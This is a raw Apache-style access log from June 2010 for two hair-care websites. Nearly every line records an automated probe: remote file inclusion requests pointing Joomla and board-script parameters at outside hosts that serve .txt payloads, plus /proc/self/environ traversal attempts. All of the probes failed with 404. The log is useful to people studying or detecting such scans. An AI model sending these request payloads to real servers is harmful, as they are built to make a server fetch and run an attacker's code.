121.88.4.141 - - [14/Jun/2010:08:44:13 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:44:27 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:46:00 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:46:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:46:03 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:46:03 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:46:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:46:07 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:46:42 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:08:46:47 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.166.6 - - [14/Jun/2010:08:47:15 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "growlonghairfast.com"
69.73.166.6 - - [14/Jun/2010:08:48:32 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:50:55 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:50:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:50:55 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:51:08 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:51:08 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [14/Jun/2010:08:51:08 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.153.27.146 - - [14/Jun/2010:08:53:12 -0700] "GET /skin/ggambo7002_board/setup?dir=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:53:12 -0700] "GET /logs//skin/ggambo7002_board/setup?dir=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:53:13 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup?dir=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:55:20 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:55:20 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [14/Jun/2010:08:55:21 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.241 - - [14/Jun/2010:09:01:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
69.73.166.6 - - [14/Jun/2010:09:04:57 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "growlonghairfast.com"
69.73.166.6 - - [14/Jun/2010:09:04:57 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "growlonghairfast.com"
69.73.166.6 - - [14/Jun/2010:09:04:57 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "growlonghairfast.com"
69.73.166.6 - - [14/Jun/2010:09:05:22 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.freehairsecrets.com"
69.73.166.6 - - [14/Jun/2010:09:05:22 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.freehairsecrets.com"
69.73.166.6 - - [14/Jun/2010:09:05:22 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.freehairsecrets.com"
119.63.198.40 - - [14/Jun/2010:09:08:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "freehairsecrets.com"
72.47.211.173 - - [14/Jun/2010:09:11:35 -0700] "GET /logs/access_100426.log///mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.47.211.173 - - [14/Jun/2010:09:11:35 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.47.211.173 - - [14/Jun/2010:09:11:36 -0700] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:12:51 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:17:39 -0700] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:17:39 -0700] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:17:39 -0700] "GET /logs/access_100503.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:17:53 -0700] "GET /logs/access_100510.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.53.228 - - [14/Jun/2010:09:19:16 -0700] "GET /logs/access_100301.log%20%20///bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.53.228 - - [14/Jun/2010:09:19:16 -0700] "GET /logs///bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.53.228 - - [14/Jun/2010:09:19:16 -0700] "GET //bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.53.228 - - [14/Jun/2010:09:19:17 -0700] "GET /logs/access_100308.log%20%20///bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.53.228 - - [14/Jun/2010:09:19:57 -0700] "GET //bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.53.228 - - [14/Jun/2010:09:19:57 -0700] "GET /logs///bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.53.228 - - [14/Jun/2010:09:19:58 -0700] "GET /logs/access.log%20%20///bbs///////delete_all.php?board_skin_path=http://www.flowx.com/media/dex/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.191.40.23 - - [14/Jun/2010:09:20:09 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
195.191.40.23 - - [14/Jun/2010:09:20:09 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
201.94.229.85 - - [14/Jun/2010:09:20:43 -0700] "GET /index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
201.94.229.85 - - [14/Jun/2010:09:20:43 -0700] "GET /logs/access_100322.log//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
201.94.229.85 - - [14/Jun/2010:09:20:48 -0700] "GET /logs//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:09:21:21 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.183.116 - - [14/Jun/2010:09:21:21 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.183.116 - - [14/Jun/2010:09:21:22 -0700] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [14/Jun/2010:09:23:03 -0700] "GET /logs/access_100426.log//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:23:03 -0700] "GET /logs//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:23:03 -0700] "GET /write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:25:02 -0700] "GET /logs/access_100510.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:25:02 -0700] "GET /logs/access_100503.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:25:17 -0700] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.108.254.21 - - [14/Jun/2010:09:25:17 -0700] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.108.254.21 - - [14/Jun/2010:09:25:17 -0700] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.229.90.201 - - [14/Jun/2010:09:25:50 -0700] "GET /logs/access_091221.log%20%20//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:09:25:50 -0700] "GET /logs//index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.229.90.201 - - [14/Jun/2010:09:25:50 -0700] "GET /index.php?option=com_virtuemart&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:09:26:36 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:09:26:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:26:59 -0700] "GET /logs/access_100412.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:09:27:01 -0700] "GET /logs/access_100412.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:27:24 -0700] "GET /logs/access_100426.log%20%20//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:29:41 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.59.70.30 - - [14/Jun/2010:09:29:52 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.59.70.30 - - [14/Jun/2010:09:29:52 -0700] "GET /logs/access_100412.log/index.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.59.70.30 - - [14/Jun/2010:09:29:52 -0700] "GET /index.php?mosConfig_absolute_path=http://store.sapura.com.sg/cache/newlog/help/bodo.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:31:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:31:37 -0700] "GET /logs/access_100301.log%20%20//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:32:28 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:32:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:32:30 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:09:34:49 -0700] "GET /logs/access_100125.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.191.40.23 - - [14/Jun/2010:09:35:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Opera/7.11 (Windows NT 5.1; U) [en]" "freehairsecrets.com"
195.191.40.23 - - [14/Jun/2010:09:35:43 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Opera/7.11 (Windows NT 5.1; U) [en]" "freehairsecrets.com"
219.255.132.83 - - [14/Jun/2010:09:36:09 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:36:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:36:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:38:32 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:38:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:09:38:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:09:38:49 -0700] "GET /logs//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [14/Jun/2010:09:38:49 -0700] "GET /write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [14/Jun/2010:09:38:49 -0700] "GET /logs/access.log%20%20//write_update.skin.php?board_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.108.254.21 - - [14/Jun/2010:09:40:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:40:39 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:40:40 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:40:48 -0700] "GET /logs/access_100322.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:40:49 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:40:49 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:40:49 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:41:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.108.254.21 - - [14/Jun/2010:09:41:29 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.108.254.21 - - [14/Jun/2010:09:41:29 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.108.254.21 - - [14/Jun/2010:09:42:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:42:57 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.108.254.21 - - [14/Jun/2010:09:42:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:09:43:09 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
